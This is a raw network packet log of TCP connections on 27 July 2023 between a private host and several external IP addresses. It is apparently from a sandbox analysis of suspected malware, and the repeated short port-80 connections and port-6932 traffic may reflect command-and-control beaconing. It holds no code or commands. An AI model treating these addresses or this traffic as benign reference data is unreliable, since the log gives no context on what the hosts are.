Jul 27, 2023 20:19:23.731312037 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731328964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731352091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731374979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731384993 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731399059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731414080 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731422901 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731446028 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731448889 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731468916 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731492996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731515884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731523037 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731539011 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731551886 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731563091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731586933 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731610060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731621981 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731633902 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731647015 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731658936 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731681108 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731703997 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731713057 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731726885 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731739044 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731750965 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731775045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731792927 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731798887 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731823921 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731827021 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731847048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731870890 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731894970 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731900930 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731924057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731933117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731950045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731973886 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731997967 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732011080 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.732023001 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732040882 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.732048035 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732072115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732079029 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.732095957 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732120991 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732144117 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732156038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.732167959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732182026 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.732192993 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732215881 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.732219934 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.732240915 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.733154058 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.734177113 CEST	80	49771	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.734250069 CEST	49771	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.737644911 CEST	80	49772	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.737974882 CEST	49772	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.738913059 CEST	49772	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.739145041 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.772049904 CEST	80	49772	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.773518085 CEST	80	49772	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.777184963 CEST	49772	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.805351973 CEST	49768	6932	192.168.2.4	51.89.201.49
Jul 27, 2023 20:19:23.838814974 CEST	6932	49768	51.89.201.49	192.168.2.4
Jul 27, 2023 20:19:23.885211945 CEST	49768	6932	192.168.2.4	51.89.201.49
Jul 27, 2023 20:19:23.922333002 CEST	49772	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.923176050 CEST	49773	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.954061031 CEST	80	49772	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.955102921 CEST	80	49773	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.955184937 CEST	49772	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.955236912 CEST	49773	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.955902100 CEST	49773	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.987963915 CEST	80	49773	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.989577055 CEST	80	49773	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.992203951 CEST	49773	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.121289968 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:24.121293068 CEST	49773	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.121354103 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:24.124145985 CEST	49774	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.137584925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.137617111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.153752089 CEST	80	49773	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.154016972 CEST	49773	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.155917883 CEST	80	49774	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.156768084 CEST	49774	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.158037901 CEST	49774	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.189754963 CEST	80	49774	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.191442013 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.191484928 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.191569090 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:24.191943884 CEST	80	49774	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.192017078 CEST	49774	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.205647945 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:24.205701113 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:24.221873999 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.221905947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.307905912 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.308099031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:24.308154106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:24.377091885 CEST	49774	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.377995014 CEST	49775	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.378525972 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:24.378597021 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:24.408917904 CEST	80	49774	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.409256935 CEST	49774	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.409708977 CEST	80	49775	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.409815073 CEST	49775	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.413592100 CEST	49775	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.445177078 CEST	80	49775	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.446882010 CEST	80	49775	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.446984053 CEST	49775	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.597727060 CEST	49775	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.598593950 CEST	49776	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.629709959 CEST	80	49775	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.630110025 CEST	49775	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.630506992 CEST	80	49776	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.630678892 CEST	49776	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.631247997 CEST	49776	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.652558088 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:24.652601004 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:24.663281918 CEST	80	49776	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.664943933 CEST	80	49776	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.665963888 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:24.666098118 CEST	49776	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.713505030 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:24.778546095 CEST	49776	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.779789925 CEST	49777	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.810842037 CEST	80	49776	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.810940981 CEST	49776	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.811316013 CEST	80	49777	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.811439991 CEST	49777	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.811933994 CEST	49777	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.843862057 CEST	80	49777	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.845868111 CEST	80	49777	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:24.846021891 CEST	49777	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.846987963 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:24.988121986 CEST	49777	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:24.988951921 CEST	49779	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.020005941 CEST	80	49777	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.020705938 CEST	80	49779	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.020818949 CEST	49777	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.020863056 CEST	49779	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.049464941 CEST	49779	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.081198931 CEST	80	49779	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.084454060 CEST	80	49779	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.084604979 CEST	49779	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.103739023 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:25.105395079 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:25.105703115 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:25.289791107 CEST	49779	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.291420937 CEST	49780	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.321706057 CEST	80	49779	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.321830034 CEST	49779	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.322958946 CEST	80	49780	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.323076010 CEST	49780	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.330547094 CEST	49780	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.361552000 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:25.362066984 CEST	80	49780	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.363779068 CEST	80	49780	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.363868952 CEST	49780	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.411914110 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:25.480798960 CEST	49780	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.481669903 CEST	49781	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.512247086 CEST	80	49780	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.512346029 CEST	49780	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.513149023 CEST	80	49781	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.513225079 CEST	49781	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.513680935 CEST	49781	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.545573950 CEST	80	49781	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.547384977 CEST	80	49781	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.547521114 CEST	49781	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.635670900 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:25.643790960 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:25.697866917 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:25.723845005 CEST	49781	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.724682093 CEST	49782	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.755765915 CEST	80	49781	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.755845070 CEST	49781	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.756298065 CEST	80	49782	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.756381035 CEST	49782	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.756822109 CEST	49782	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.788357973 CEST	80	49782	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.789772034 CEST	80	49782	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.789838076 CEST	49782	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.907299042 CEST	49782	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.908118010 CEST	49783	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.939193010 CEST	80	49782	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.939270973 CEST	49782	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.939886093 CEST	80	49783	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:25.940053940 CEST	49783	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:25.986160994 CEST	49783	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.017889023 CEST	80	49783	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.019428968 CEST	80	49783	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.019520998 CEST	49783	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.141555071 CEST	49783	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.144471884 CEST	49784	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.167957067 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.167993069 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.168015957 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.168067932 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.168277979 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.168349981 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.173182011 CEST	80	49783	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.173296928 CEST	49783	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.176628113 CEST	80	49784	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.176764965 CEST	49784	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.196492910 CEST	49784	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.212954044 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:26.213011026 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:26.228741884 CEST	80	49784	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.230843067 CEST	80	49784	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.230923891 CEST	49784	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.404736042 CEST	49784	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.414380074 CEST	49785	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.425100088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425142050 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425170898 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425218105 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425223112 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.425261974 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425275087 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.425306082 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425335884 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425358057 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.425379992 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.425440073 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.437110901 CEST	80	49784	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.437284946 CEST	49784	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.446674109 CEST	80	49785	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.446796894 CEST	49785	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.449615955 CEST	49785	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.481894970 CEST	80	49785	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.483433962 CEST	80	49785	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.483519077 CEST	49785	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.487447977 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:26.487509012 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:26.503612995 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:26.557322979 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:26.628590107 CEST	49785	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.629544973 CEST	49786	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.661216021 CEST	80	49785	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.661338091 CEST	49785	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.661531925 CEST	80	49786	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.661619902 CEST	49786	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.662014008 CEST	49786	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.682061911 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682130098 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682295084 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.682315111 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682383060 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682435989 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682454109 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.682503939 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682553053 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682574034 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.682642937 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.682706118 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.682980061 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683026075 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683070898 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683100939 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.683136940 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683209896 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.683389902 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683448076 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683497906 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683516979 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.683563948 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.683629990 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.694163084 CEST	80	49786	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.695596933 CEST	80	49786	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.695688963 CEST	49786	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.745397091 CEST	49768	6932	192.168.2.4	51.89.201.49
Jul 27, 2023 20:19:26.779409885 CEST	6932	49768	51.89.201.49	192.168.2.4
Jul 27, 2023 20:19:26.808377028 CEST	49786	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.809094906 CEST	49787	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.840753078 CEST	80	49786	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.840780973 CEST	80	49787	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.840816021 CEST	49786	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.840884924 CEST	49787	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.841371059 CEST	49787	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.869914055 CEST	49768	6932	192.168.2.4	51.89.201.49
Jul 27, 2023 20:19:26.873123884 CEST	80	49787	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.874881029 CEST	80	49787	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:26.874955893 CEST	49787	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.940093994 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940133095 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940156937 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940181017 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940203905 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940222025 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940226078 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940248966 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940272093 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940289974 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940290928 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940316916 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940340042 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940340996 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940361977 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940385103 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940386057 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940407991 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940426111 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940429926 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940453053 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940474987 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940478086 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940496922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940520048 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.940521002 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.940558910 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.941179991 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941207886 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941231012 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941252947 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941267014 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.941276073 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941298008 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941301107 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.941318989 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941339016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.941340923 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.941380024 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.942217112 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.942245960 CEST	80	49778	183.100.39.157	192.168.2.4
